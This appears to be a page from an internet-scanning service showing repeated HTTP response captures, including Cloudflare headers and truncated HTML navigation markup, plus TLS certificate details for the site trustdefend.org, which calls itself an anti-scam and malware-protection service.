                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-06 by HttpPlugin
    Create report
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-04 15:52

    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 15:52:09 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VcbnNUif3YLi1ruSMsBS1KcHUbp7YBRcFv%2BYS7rVtieArdJCZ89bWUPZ5aClt7OUUIFWMWKchleUNzbFcjiIUjkXZy3f5H0oFi7wUn%2BGLK0R2frDSI4qGJzA95DBgLylt1LYaS5N"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88e916a1aa4fa1f6-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-04 by HttpPlugin
    Create report
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-02 20:34

    HTTP/1.1 200 OK
    Date: Sun, 02 Jun 2024 20:34:07 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCYUgVP4pSMLTz%2FkAtTFAc7oR6HAFnlG12bQa4AxmONJ8bcZHnDkOBXn9S3xW7Qs%2Fmvubr%2BiSbkFbmnSKPo1KNsE2VrfitfYsYVYCCbGTWWXmOJgGTpS%2FgiZtRKdCNQEHR%2FakcNM"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88da38ec3fb093e4-LHR
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-02 by HttpPlugin
    Create report
trustdefend.org*.trustdefend.org
CN:
trustdefend.org
Key:
ECDSA-256
Issuer:
WE1
Not before:
2024-06-11 23:40
Not after:
2024-09-09 23:40
trustdefend.org*.trustdefend.org
CN:
trustdefend.org
Key:
RSA-2048
Issuer:
Not before:
2024-04-13 23:55
Not after:
2024-07-12 23:55